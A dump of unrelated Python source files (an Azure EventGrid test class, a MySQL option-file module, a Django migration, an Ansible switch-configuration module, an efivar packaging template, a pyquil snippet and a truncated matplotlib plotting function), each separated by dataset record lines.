from cloudevents.http import CloudEvent
from eventgrid_preparer import (
EventGridPreparer,
)
class TestEventGridPublisherClientCncf(AzureRecordedTestCase):
    """Recorded tests for publishing cloudevents-SDK CloudEvent objects
    through the async EventGridPublisherClient, one test per payload shape
    (dict, bytes, None, str, list, extension attributes)."""

    def create_eg_publisher_client(self, endpoint):
        # Credential type (key vs AAD) is chosen by the recording framework.
        credential = self.get_credential(EventGridPublisherClient, is_async=True)
        client = self.create_client_from_credential(EventGridPublisherClient, credential=credential, endpoint=endpoint)
        return client

    @EventGridPreparer()
    @recorded_by_proxy_async
    @pytest.mark.asyncio
    async def test_send_cloud_event_data_dict(self, variables, eventgrid_cloud_event_topic_endpoint):
        # A dict payload must be serialized under "data" (not "data_base64").
        client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
        attributes = {
            "type": "com.example.sampletype1",
            "source": "https://example.com/event-producer",
        }
        data = {"message": "Hello World!"}
        cloud_event = CloudEvent(attributes, data)

        def callback(request):
            # Inspect the raw HTTP body to verify on-the-wire serialization.
            req = json.loads(request.http_request.body)
            assert req[0].get("data") is not None
            assert isinstance(req[0], dict)
            assert req[0].get("type") == "com.example.sampletype1"
            assert req[0].get("source") == "https://example.com/event-producer"

        await client.send(cloud_event, raw_request_hook=callback)

    @EventGridPreparer()
    @recorded_by_proxy_async
    @pytest.mark.asyncio
    async def test_send_cloud_event_data_base64_using_data(self, variables, eventgrid_cloud_event_topic_endpoint):
        # A bytes payload must be serialized under "data_base64", not "data".
        client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
        attributes = {
            "type": "com.example.sampletype1",
            "source": "https://example.com/event-producer",
        }
        data = b'hello world'
        cloud_event = CloudEvent(attributes, data)

        def callback(request):
            req = json.loads(request.http_request.body)
            assert req[0].get("data_base64") is not None
            assert req[0].get("data") is None

        await client.send(cloud_event, raw_request_hook=callback)

    @EventGridPreparer()
    @recorded_by_proxy_async
    @pytest.mark.asyncio
    async def test_send_cloud_event_data_none(self, variables, eventgrid_cloud_event_topic_endpoint):
        # Events with no data at all must still send successfully.
        client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
        attributes = {
            "type": "com.example.sampletype1",
            "source": "https://example.com/event-producer",
        }
        data = None
        cloud_event = CloudEvent(attributes, data)
        await client.send(cloud_event)

    @EventGridPreparer()
    @recorded_by_proxy_async
    @pytest.mark.asyncio
    async def test_send_cloud_event_data_str(self, variables, eventgrid_cloud_event_topic_endpoint):
        # A str payload is JSON text, so it goes under "data" (not base64).
        client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
        attributes = {
            "type": "com.example.sampletype1",
            "source": "https://example.com/event-producer",
        }
        data = "hello world"
        cloud_event = CloudEvent(attributes, data)

        def callback(request):
            req = json.loads(request.http_request.body)
            assert req[0].get("data_base64") is None
            assert req[0].get("data") is not None

        await client.send(cloud_event, raw_request_hook=callback)

    @EventGridPreparer()
    @recorded_by_proxy_async
    @pytest.mark.asyncio
    async def test_send_cloud_event_data_as_list(self, variables, eventgrid_cloud_event_topic_endpoint):
        # send() accepts a list of events as well as a single event.
        client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
        attributes = {
            "type": "com.example.sampletype1",
            "source": "https://example.com/event-producer",
        }
        data = "hello world"
        cloud_event = CloudEvent(attributes, data)
        await client.send([cloud_event])

    @EventGridPreparer()
    @recorded_by_proxy_async
    @pytest.mark.asyncio
    async def test_send_cloud_event_data_with_extensions(self, variables, eventgrid_cloud_event_topic_endpoint):
        # Extension attributes (here "ext1") ride along with the event.
        client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
        attributes = {
            "type": "com.example.sampletype1",
            "source": "https://example.com/event-producer",
            "ext1": "extension"
        }
        data = "hello world"
        cloud_event = CloudEvent(attributes, data)
        await client.send([cloud_event])
| StarcoderdataPython |
224581 | <filename>plugins/holland.backup.mysqldump/holland/backup/mysqldump/mysql/option.py
"""MySQL option files support
http://dev.mysql.com/doc/refman/5.1/en/option-files.html
"""
import os
import re
import codecs
import logging
from holland.backup.mysqldump.util import INIConfig, BasicConfig
from holland.backup.mysqldump.util.config import update_config
from holland.backup.mysqldump.util.ini import ParsingError
LOG = logging.getLogger(__name__)
def merge_options(path,
                  *defaults_files,
                  **kwargs):
    """Merge several MySQL defaults files plus keyword overrides and write
    the result to *path*.

    Recognized keyword overrides: user, password, socket, host, port.
    Later defaults files (and then overrides) win over earlier ones.
    """
    merged = INIConfig()
    merged._new_namespace('client')
    for defaults_file in defaults_files:
        update_config(merged, load_options(defaults_file))
    for key in ('user', 'password', 'socket', 'host', 'port'):
        value = kwargs.get(key)
        if value is not None:
            merged['client'][key] = value
    write_options(merged, path)
def load_options(filename):
    """Load a MySQL option file from *filename* and return only its
    client-authentication sections (see client_sections).

    Unparsable lines are skipped with a debug log entry rather than being
    fatal, matching mysqld's lenient option-file handling.
    """
    filename = os.path.abspath(os.path.expanduser(filename))
    cfg = INIConfig()
    try:
        cfg._readfp(open(filename, 'r'))
    except ParsingError, exc:  # Python 2 except syntax; module predates py3
        LOG.debug("Skipping unparsable lines")
        for lineno, line in exc.errors:
            LOG.debug("Ignored line %d: %s", lineno, line.rstrip())
    return client_sections(cfg)
def unquote(value):
    """Strip surrounding double quotes from *value* and expand MySQL
    option-file escape sequences (\\b \\t \\n \\r \\\\ \\s \\"), per
    http://dev.mysql.com/doc/refman/5.0/en/option-files.html
    """
    if len(value) > 1 and value.startswith('"') and value.endswith('"'):
        value = value[1:-1]
    escape_map = {
        'b': "\b",
        't': "\t",
        'n': "\n",
        'r': "\r",
        '\\': "\\",
        's': " ",
        '"': '"',
    }

    def _expand(match):
        return escape_map[match.group(1)]

    return re.sub(r'\\(["btnr\\s])', _expand, value)
def quote(value):
    """Wrap *value* in double quotes, backslash-escaping embedded quotes."""
    escaped = value.replace('"', '\\"')
    return '"%s"' % escaped
def client_sections(config):
    """Copy only the client-auth relevant sections out of *config*.

    Options from [client], [mysql] and [holland] are collapsed into a
    single [client] namespace, keeping only authentication keys
    (see client_keys).
    """
    collapsed = INIConfig()
    collapsed._new_namespace('client')
    for section_name in ('client', 'mysql', 'holland'):
        if section_name in config:
            update_config(collapsed.client, client_keys(config[section_name]))
    return collapsed
def client_keys(config):
    """Return a copy of *config* with non-authentication options removed.

    Authentication options kept (and unquoted): user, password, host,
    port, socket.
    """
    filtered = BasicConfig()
    update_config(filtered, config)
    allowed = ('user', 'password', 'host', 'port', 'socket')
    for key in config:
        if key in allowed:
            filtered[key] = unquote(config[key])
        else:
            del filtered[key]
    return filtered
def write_options(config, filename):
    """Serialize *config* to *filename* (a path or an open file object),
    quoting any values that contain embedded double quotes.

    NOTE(review): quoted_config is built but never used, and the quoting
    loop mutates the caller's *config* in place — confirm that is intended.
    """
    quoted_config = INIConfig()
    update_config(quoted_config, config)
    for section in config:
        for key in config[section]:
            if '"' in config[section][key]:
                config[section][key] = quote(config[section][key])
    # Python 2 idioms below (basestring, unicode, print >>); byte-identical.
    if isinstance(filename, basestring):
        filename = codecs.open(filename, 'w', 'utf8')
    data = unicode(config)
    print >>filename, data
    filename.close()
| StarcoderdataPython |
6478296 | <reponame>epanjwani/activity
# Generated by Django 2.2.10 on 2020-08-17 15:24
import datetime

import django.core.validators
import django.db.models.deletion
from django.db import migrations, models

import formlibrary.models.case
class Migration(migrations.Migration):
    """Auto-generated (and apparently hand-consolidated) migration reworking
    Individual into a Case subclass and fleshing out Household contact fields.

    NOTE(review): several AddField/AlterField operations reference
    django.core.validators — ensure it is imported at module top, otherwise
    this migration raises NameError when loaded.
    Operation order is load-bearing; do not reorder.
    """

    dependencies = [
        ('formlibrary', '0009_merge_20200620_0127'),
    ]

    operations = [
        migrations.AlterField(
            model_name='individual',
            name='create_date',
            field=models.DateTimeField(blank=True, default=datetime.datetime.now, null=True, verbose_name='Creation date'),
        ),
        migrations.RenameField(
            model_name='individual',
            old_name='remarks',
            new_name='description',
        ),
        migrations.RenameField(
            model_name='individual',
            old_name='household',
            new_name='household_id',
        ),
        migrations.RenameField(
            model_name='individual',
            old_name='father_name',
            new_name='id_number',
        ),
        migrations.RenameField(
            model_name='individual',
            old_name='gender',
            new_name='id_type',
        ),
        migrations.RemoveField(
            model_name='individual',
            name='distribution',
        ),
        migrations.RemoveField(
            model_name='individual',
            name='training',
        ),
        migrations.AddField(
            model_name='individual',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Created by'),
        ),
        migrations.AddField(
            model_name='individual',
            name='date_of_birth',
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='individual',
            name='head_of_household',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='individual',
            name='last_name',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='individual',
            name='modified_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Last Modified by'),
        ),
        migrations.AddField(
            model_name='individual',
            name='photo',
            field=models.ImageField(blank=True, null=True, upload_to=None),
        ),
        migrations.AddField(
            model_name='individual',
            name='primary_number',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='individual',
            name='secondary_number',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='individual',
            name='sex',
            field=models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female')], max_length=1, null=True),
        ),
        migrations.RemoveField(
            model_name='individual',
            name='program',
        ),
        migrations.AddField(
            model_name='individual',
            name='program',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Program'),
        ),
        # Individual becomes a multi-table-inheritance child of Case:
        # drop its own pk and add the parent link.
        migrations.RemoveField(
            model_name='individual',
            name='id',
        ),
        migrations.AddField(
            model_name='individual',
            name='case_ptr',
            field=models.OneToOneField(auto_created=True, default=0, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='formlibrary.Case'),
            preserve_default=False,
        ),
        migrations.RemoveField(
            model_name='individual',
            name='age',
        ),
        migrations.AddField(
            model_name='household',
            name='city',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='household',
            name='country',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='household',
            name='create_date',
            field=models.DateTimeField(blank=True, default=datetime.datetime.now, null=True, verbose_name='Creation date'),
        ),
        migrations.AddField(
            model_name='household',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Created by'),
        ),
        migrations.AddField(
            model_name='household',
            name='email',
            field=models.CharField(blank=True, max_length=100, validators=[django.core.validators.RegexValidator(message='Invalid Email Address.', regex='^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$')]),
        ),
        migrations.AddField(
            model_name='household',
            name='individuals',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='formlibrary.Individual'),
        ),
        migrations.AddField(
            model_name='household',
            name='modified_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Last Modified by'),
        ),
        migrations.AddField(
            model_name='household',
            name='modified_date',
            field=models.DateTimeField(blank=True, null=True, verbose_name='Last Modification date'),
        ),
        migrations.AddField(
            model_name='household',
            name='postal_code',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='household',
            name='prim_phone',
            field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
        ),
        migrations.AddField(
            model_name='household',
            name='secondary_phone',
            field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
        ),
        migrations.AddField(
            model_name='household',
            name='street',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        # Phone fields are renamed via remove/add (prim_phone -> primary_phone,
        # integer *_number -> validated char *_phone).
        migrations.RemoveField(
            model_name='household',
            name='prim_phone',
        ),
        migrations.RemoveField(
            model_name='individual',
            name='primary_number',
        ),
        migrations.RemoveField(
            model_name='individual',
            name='secondary_number',
        ),
        migrations.AddField(
            model_name='household',
            name='primary_phone',
            field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
        ),
        migrations.AddField(
            model_name='individual',
            name='primary_phone',
            field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
        ),
        migrations.AddField(
            model_name='individual',
            name='secondary_phone',
            field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
        ),
        migrations.AlterField(
            model_name='household',
            name='secondary_phone',
            field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
        ),
        migrations.AlterField(
            model_name='individual',
            name='photo',
            field=models.ImageField(blank=True, null=True, upload_to='media/images', validators=[formlibrary.models.case.validate_image]),
        ),
    ]
3558979 | <filename>lib/python3.8/site-packages/ansible_collections/community/network/plugins/modules/network/icx/icx_system.py
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: icx_system
author: "Ruckus Wireless (@Commscope)"
short_description: Manage the system attributes on Ruckus ICX 7000 series switches
description:
- This module provides declarative management of node system attributes
on Ruckus ICX 7000 series switches. It provides an option to configure host system
parameters or remove those parameters from the device active
configuration.
notes:
- Tested against ICX 10.1.
- For information on using ICX platform, see L(the ICX OS Platform Options guide,../network/user_guide/platform_icx.html).
options:
hostname:
description:
- Configure the device hostname parameter. This option takes an ASCII string value.
type: str
domain_name:
description:
- Configure the IP domain name on the remote device to the provided value.
Value should be in the dotted name form and
will be appended to the hostname to create a fully-qualified domain name.
type: list
domain_search:
description:
- Provides the list of domain names to
append to the hostname for the purpose of doing name resolution.
This argument accepts a list of names and will be reconciled
with the current active configuration on the running node.
type: list
name_servers:
description:
- List of DNS name servers by IP address to use to perform name resolution
lookups.
type: list
aaa_servers:
description:
- Configures radius/tacacs server
type: list
suboptions:
type:
description:
- specify the type of the server
type: str
choices: ['radius','tacacs']
hostname:
description:
- Configures the host name of the RADIUS server
type: str
auth_port_type:
description:
- specifies the type of the authentication port
type: str
choices: ['auth-port']
auth_port_num:
description:
- Configures the authentication UDP port. The default value is 1812.
type: str
acct_port_num:
description:
- Configures the accounting UDP port. The default value is 1813.
type: str
acct_type:
description:
- Usage of the accounting port.
type: str
choices: ['accounting-only', 'authentication-only','authorization-only', default]
auth_key:
description:
- Configure the key for the server
type: str
auth_key_type:
description:
- List of authentication level specified in the choices
type: list
choices: ['dot1x','mac-auth','web-auth']
state:
description:
- State of the configuration
values in the device's current active configuration. When set
to I(present), the values should be configured in the device active
configuration and when set to I(absent) the values should not be
in the device active configuration
type: str
default: present
choices: ['present', 'absent']
check_running_config:
description:
- Check running configuration. This can be set as environment variable.
Module will use environment variable value(default:True), unless it is overridden, by specifying it as module parameter.
type: bool
default: yes
'''
EXAMPLES = """
- name: Configure hostname and domain name
community.network.icx_system:
hostname: icx
domain_search:
- ansible.com
- redhat.com
- ruckus.com
- name: Configure radius server of type auth-port
community.network.icx_system:
aaa_servers:
- type: radius
hostname: radius-server
auth_port_type: auth-port
auth_port_num: 1821
acct_port_num: 1321
acct_type: accounting-only
auth_key: abc
auth_key_type:
- dot1x
- mac-auth
- name: Configure tacacs server
community.network.icx_system:
aaa_servers:
- type: tacacs
hostname: tacacs-server
auth_port_type: auth-port
auth_port_num: 1821
acct_port_num: 1321
acct_type: accounting-only
auth_key: xyz
- name: Configure name servers
community.network.icx_system:
name_servers:
- 8.8.8.8
- 8.8.4.4
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- hostname icx
- ip domain name test.example.com
- radius-server host 172.16.10.12 auth-port 2083 acct-port 1850 default key abc dot1x mac-auth
- tacacs-server host 10.2.3.4 auth-port 4058 authorization-only key xyz
"""
import re
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule, env_fallback
from ansible_collections.community.network.plugins.module_utils.network.icx.icx import get_config, load_config
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ComplexList, validate_ip_v6_address
from ansible.module_utils.connection import Connection, ConnectionError, exec_command
def diff_list(want, have):
    """Return (additions, removals): items only in *want*, items only in *have*.

    Items may be unhashable (aaa server dicts), so membership tests use
    list containment rather than sets.
    """
    additions = [item for item in want if item not in have]
    removals = [item for item in have if item not in want]
    return additions, removals
def map_obj_to_commands(want, have, module):
    """Build the ordered list of ICX CLI commands that move the device from
    *have* (current config) to *want* (desired config) for the given state.

    want/have: dicts with keys hostname, domain_search, name_servers,
        aaa_servers (see map_params_to_obj / map_config_to_obj).
    module: the AnsibleModule, used for params['state'] and fail_json.
    """
    commands = list()
    state = module.params['state']

    def needs_update(x):
        # A key needs updating only when it is requested AND differs from device.
        return want.get(x) is not None and (want.get(x) != have.get(x))

    if state == 'absent':
        # Device currently has none of these configured: emit the removal
        # commands for everything requested anyway (keeps removal idempotent).
        if have['name_servers'] == [] and have['aaa_servers'] == [] and have['domain_search'] == [] and have['hostname'] is None:
            if want['hostname']:
                commands.append('no hostname')
            if want['domain_search']:
                for item in want['domain_search']:
                    commands.append('no ip dns domain-list %s' % item)
            if want['name_servers']:
                for item in want['name_servers']:
                    commands.append('no ip dns server-address %s' % item)
            if want['aaa_servers']:
                want_servers = []
                want_server = want['aaa_servers']
                if want_server:
                    # auth_key is write-only (never present in 'have'), so it
                    # is blanked before comparing/removing servers.
                    want_list = deepcopy(want_server)
                    for items in want_list:
                        items['auth_key'] = None
                        want_servers.append(items)
                for item in want_servers:
                    ipv6addr = validate_ip_v6_address(item['hostname'])
                    if ipv6addr:
                        commands.append('no ' + item['type'] + '-server host ipv6 ' + item['hostname'])
                    else:
                        commands.append('no ' + item['type'] + '-server host ' + item['hostname'])
        # Otherwise only remove what is actually present on the device.
        if want['hostname']:
            if have['hostname'] == want['hostname']:
                commands.append('no hostname')
        if want['domain_search']:
            for item in want['domain_search']:
                if item in have['domain_search']:
                    commands.append('no ip dns domain-list %s' % item)
        if want['name_servers']:
            for item in want['name_servers']:
                if item in have['name_servers']:
                    commands.append('no ip dns server-address %s' % item)
        if want['aaa_servers']:
            want_servers = []
            want_server = want['aaa_servers']
            have_server = have['aaa_servers']
            if want_server:
                want_list = deepcopy(want_server)
                for items in want_list:
                    items['auth_key'] = None
                    want_servers.append(items)
            for item in want_servers:
                if item in have_server:
                    ipv6addr = validate_ip_v6_address(item['hostname'])
                    if ipv6addr:
                        commands.append('no ' + item['type'] + '-server host ipv6 ' + item['hostname'])
                    else:
                        commands.append('no ' + item['type'] + '-server host ' + item['hostname'])

    elif state == 'present':
        if needs_update('hostname'):
            commands.append('hostname %s' % want['hostname'])
        if want['domain_search']:
            adds, removes = diff_list(want['domain_search'], have['domain_search'])
            for item in removes:
                commands.append('no ip dns domain-list %s' % item)
            for item in adds:
                commands.append('ip dns domain-list %s' % item)
        if want['name_servers']:
            adds, removes = diff_list(want['name_servers'], have['name_servers'])
            for item in removes:
                commands.append('no ip dns server-address %s' % item)
            for item in adds:
                commands.append('ip dns server-address %s' % item)
        if want['aaa_servers']:
            want_servers = []
            want_server = want['aaa_servers']
            have_server = have['aaa_servers']
            # Compare without auth_key (device never reports it back).
            want_list = deepcopy(want_server)
            for items in want_list:
                items['auth_key'] = None
                want_servers.append(items)
            adds, removes = diff_list(want_servers, have_server)
            for item in removes:
                ip6addr = validate_ip_v6_address(item['hostname'])
                if ip6addr:
                    cmd = 'no ' + item['type'] + '-server host ipv6 ' + item['hostname']
                else:
                    cmd = 'no ' + item['type'] + '-server host ' + item['hostname']
                commands.append(cmd)
            for w_item in adds:
                # Recover the original auth_key for this host from want_server
                # (it was blanked in want_servers for the diff above).
                for item in want_server:
                    if item['hostname'] == w_item['hostname'] and item['type'] == w_item['type']:
                        auth_key = item['auth_key']
                ip6addr = validate_ip_v6_address(w_item['hostname'])
                if ip6addr:
                    cmd = w_item['type'] + '-server host ipv6 ' + w_item['hostname']
                else:
                    cmd = w_item['type'] + '-server host ' + w_item['hostname']
                if w_item['auth_port_type']:
                    cmd += ' ' + w_item['auth_port_type'] + ' ' + w_item['auth_port_num']
                if w_item['acct_port_num'] and w_item['type'] == 'radius':
                    cmd += ' acct-port ' + w_item['acct_port_num']
                if w_item['type'] == 'tacacs':
                    # TACACS+ does not take acct-port or dot1x/mac/web key types.
                    if any((w_item['acct_port_num'], w_item['auth_key_type'])):
                        module.fail_json(msg='acct_port and auth_key_type is not applicable for tacacs server')
                if w_item['acct_type']:
                    cmd += ' ' + w_item['acct_type']
                if auth_key is not None:
                    cmd += ' key ' + auth_key
                if w_item['auth_key_type'] and w_item['type'] == 'radius':
                    val = ''
                    for y in w_item['auth_key_type']:
                        val = val + ' ' + y
                    cmd += val
                commands.append(cmd)
    return commands
def parse_hostname(config):
    """Return the device hostname parsed from the running config, or None."""
    found = re.search(r'^hostname (\S+)', config, re.M)
    return found.group(1) if found else None
def parse_domain_search(config):
    """Return every DNS domain-list name configured in *config*.

    ``re.findall`` already returns the list of captured group values, so the
    original element-by-element copy into a second list was redundant and is
    removed; the returned value is identical.
    """
    return re.findall(r'^ip dns domain[- ]list (\S+)', config, re.M)
def parse_name_servers(config):
    """Return the DNS server addresses found in the running config.

    Scans every ``ip dns server-address`` line and collects each token that
    contains digits/dots (the address itself).
    """
    servers = []
    for line in config.split('\n'):
        if 'ip dns server-address' not in line:
            continue
        for token in line.split(' '):
            found = re.search(r'([0-9.]+)', token)
            if found:
                servers.append(found.group())
    return servers
def parse_aaa_servers(config):
    """Parse radius-server / tacacs-server host lines into a list of dicts.

    Each returned dict mirrors the module's ``aaa_servers`` option schema:
    type, hostname, auth_port_type, auth_port_num, acct_port_num, acct_type,
    auth_key (always None -- keys are not readable from the config) and
    auth_key_type (a set, or None when empty).
    """
    configlines = config.split('\n')
    obj = []
    for line in configlines:
        auth_key_type = []
        if 'radius-server' in line or 'tacacs-server' in line:
            aaa_type = 'radius' if 'radius-server' in line else 'tacacs'
            # Group 2 captures an IPv6 host, group 4 an IPv4/name host.
            match = re.search(r'(host ipv6 (\S+))|(host (\S+))', line)
            if match:
                hostname = match.group(2) if match.group(2) is not None else match.group(4)
            # NOTE(review): if the host regex does not match, ``hostname``
            # keeps the value from a previous iteration (or is unbound on the
            # first) -- confirm every server line always contains "host".
            match = re.search(r'auth-port ([0-9]+)', line)
            if match:
                auth_port_num = match.group(1)
            else:
                auth_port_num = None
            match = re.search(r'acct-port ([0-9]+)', line)
            if match:
                acct_port_num = match.group(1)
            else:
                acct_port_num = None
            # Accounting type follows the acct-port number (radius syntax).
            match = re.search(r'acct-port [0-9]+ (\S+)', line)
            if match:
                acct_type = match.group(1)
            else:
                acct_type = None
            if aaa_type == 'tacacs':
                # For tacacs the type follows the auth-port number instead.
                match = re.search(r'auth-port [0-9]+ (\S+)', line)
                if match:
                    acct_type = match.group(1)
                else:
                    acct_type = None
            # Collect any radius auth-key-type flags present on the line.
            match = re.search(r'(dot1x)', line)
            if match:
                auth_key_type.append('dot1x')
            match = re.search(r'(mac-auth)', line)
            if match:
                auth_key_type.append('mac-auth')
            match = re.search(r'(web-auth)', line)
            if match:
                auth_key_type.append('web-auth')
            obj.append({
                'type': aaa_type,
                'hostname': hostname,
                'auth_port_type': 'auth-port',
                'auth_port_num': auth_port_num,
                'acct_port_num': acct_port_num,
                'acct_type': acct_type,
                'auth_key': None,
                'auth_key_type': set(auth_key_type) if len(auth_key_type) > 0 else None
            })
    return obj
def map_config_to_obj(module):
    """Build the 'have' state dict by parsing the device running config."""
    running = get_config(module, None,
                         compare=module.params['check_running_config'])
    return {
        'hostname': parse_hostname(running),
        'domain_search': parse_domain_search(running),
        'name_servers': parse_name_servers(running),
        'aaa_servers': parse_aaa_servers(running)
    }
def map_params_to_obj(module):
    """Build the 'want' state dict from the module parameters.

    Each AAA server's ``auth_key_type`` list is normalized into a set (in
    place) so later comparison against the parsed config is order-insensitive.
    """
    params = module.params
    for server in params['aaa_servers'] or []:
        if server['auth_key_type']:
            server['auth_key_type'] = set(server['auth_key_type'])
    return {
        'hostname': params['hostname'],
        'domain_name': params['domain_name'],
        'domain_search': params['domain_search'],
        'name_servers': params['name_servers'],
        'state': params['state'],
        'aaa_servers': params['aaa_servers']
    }
def main():
    """ Main entry point for Ansible module execution
    """
    # Per-entry schema for the aaa_servers list option.
    server_spec = dict(
        type=dict(choices=['radius', 'tacacs']),
        hostname=dict(),
        auth_port_type=dict(choices=['auth-port']),
        auth_port_num=dict(),
        acct_port_num=dict(),
        acct_type=dict(choices=['accounting-only', 'authentication-only', 'authorization-only', 'default']),
        auth_key=dict(),
        auth_key_type=dict(type='list', choices=['dot1x', 'mac-auth', 'web-auth'])
    )
    argument_spec = dict(
        hostname=dict(),
        domain_name=dict(type='list'),
        domain_search=dict(type='list'),
        name_servers=dict(type='list'),
        aaa_servers=dict(type='list', elements='dict', options=server_spec),
        state=dict(choices=['present', 'absent'], default='present'),
        check_running_config=dict(default=True, type='bool', fallback=(env_fallback, ['ANSIBLE_CHECK_ICX_RUNNING_CONFIG']))
    )
    module = AnsibleModule(argument_spec=argument_spec,
                           supports_check_mode=True)
    result = {'changed': False}
    warnings = list()
    result['warnings'] = warnings
    # Disable paging on the device before reading the config.
    exec_command(module, 'skip')
    # Diff desired state (params) against actual state (running config).
    want = map_params_to_obj(module)
    have = map_config_to_obj(module)
    commands = map_obj_to_commands(want, have, module)
    result['commands'] = commands
    if commands:
        # Only push the commands when not in check mode.
        if not module.check_mode:
            load_config(module, commands)
        result['changed'] = True
    module.exit_json(**result)
# Standard script entry point guard.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
# cports/cbuild packaging template for efivar.  NOTE(review): names such as
# `subpackage`, `self.make`, `self.install_bin`, `self.default_libs` and
# `self.default_devel` are injected by the cbuild template machinery, not
# defined in this file -- confirm against the cbuild API.
pkgname = "efivar"
pkgver = "37"
pkgrel = 0
build_style = "makefile"
make_cmd = "gmake"
make_build_target = "all"
make_build_args = ["libdir=/usr/lib", "ERRORS="]
make_install_args = ["libdir=/usr/lib"]
make_check_target = "test"
hostmakedepends = ["pkgconf", "gmake"]
makedepends = ["linux-headers"]
pkgdesc = "Tools and libraries to work with EFI variables"
# NOTE(review): maintainer string was scrubbed by the dataset ("<<EMAIL>>");
# restore the real address before use.
maintainer = "q66 <<EMAIL>>"
license = "LGPL-2.1-or-later"
url = "https://github.com/rhboot/efivar"
source = f"{url}/releases/download/{pkgver}/{pkgname}-{pkgver}.tar.bz2"
sha256 = "3c67feb93f901b98fbb897d5ca82931a6698b5bcd6ac34f0815f670d77747b9f"
tool_flags = {"CFLAGS": ["-D_GNU_SOURCE"]}

def post_build(self):
    # Also build the test helper binary that ships in src/test.
    self.make.invoke(None, ["-C", "src/test"])

def post_install(self):
    # Install the tester under a namespaced binary name.
    self.install_bin("src/test/tester", name = "efivar-tester")

@subpackage("libefivar")
def _lib(self):
    # Runtime-library subpackage.
    self.pkgdesc = f"{pkgdesc} (runtime library)"
    return self.default_libs()

@subpackage("efivar-devel")
def _devel(self):
    # Development headers/pkgconfig subpackage.
    return self.default_devel()
| StarcoderdataPython |
1747760 | <reponame>PacktPublishing/Learn-Quantum-Computing-with-Python
from pyquil import Program
from pyquil.gates import *

# Build a one-instruction Quil program -- a Pauli-X (NOT) gate on qubit 0 --
# and print its Quil text.  (Fix: the final line carried a fused dataset
# residue marker that made it a syntax error; removed.)
program = Program()
program = program + X(0)
print(program)
161541 | import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.cm as cm
from matplotlib.lines import Line2D
def plotMeasurement(L, indices, measurements, s=0.25, filename=None, title=None, url=None):
    """Render measurement probabilities as a 3D bar chart over site pairs.

    L: number of sites (two columns per site, labelled "1L", "1R", ...).
    indices: tuples (i, si, j, sj, label) where si/sj is 'l' or 'r'.
    measurements: probability in [0, 1] per index tuple (bar height/color).
    s: gap between bars (bar side length is 1 - s).
    filename: when given, saves two views as <filename>_45.png / _135.png.
    """
    fig = plt.figure()
    axes = fig.add_subplot(111, projection='3d')
    x, y, z = [], [], []
    dx, dy, dz, c = [], [], [], []
    l = 1. - s
    cmap = plt.get_cmap('plasma')
    # Axis tick labels: "<site>L" and "<site>R" for each site.
    column_names = []
    for j in range(L):
        name = '{0}L'.format(str(j+1))
        column_names.append(name)
        name = '{0}R'.format(str(j+1))
        column_names.append(name)
    for index, measurement in zip(indices, measurements):
        i, si, j, sj, label = index
        # Map (site, side) to a column index: right side occupies odd slots.
        idx_i = 2*i
        if si == 'r':
            idx_i += 1
        idx_j = 2*j
        if sj == 'r':
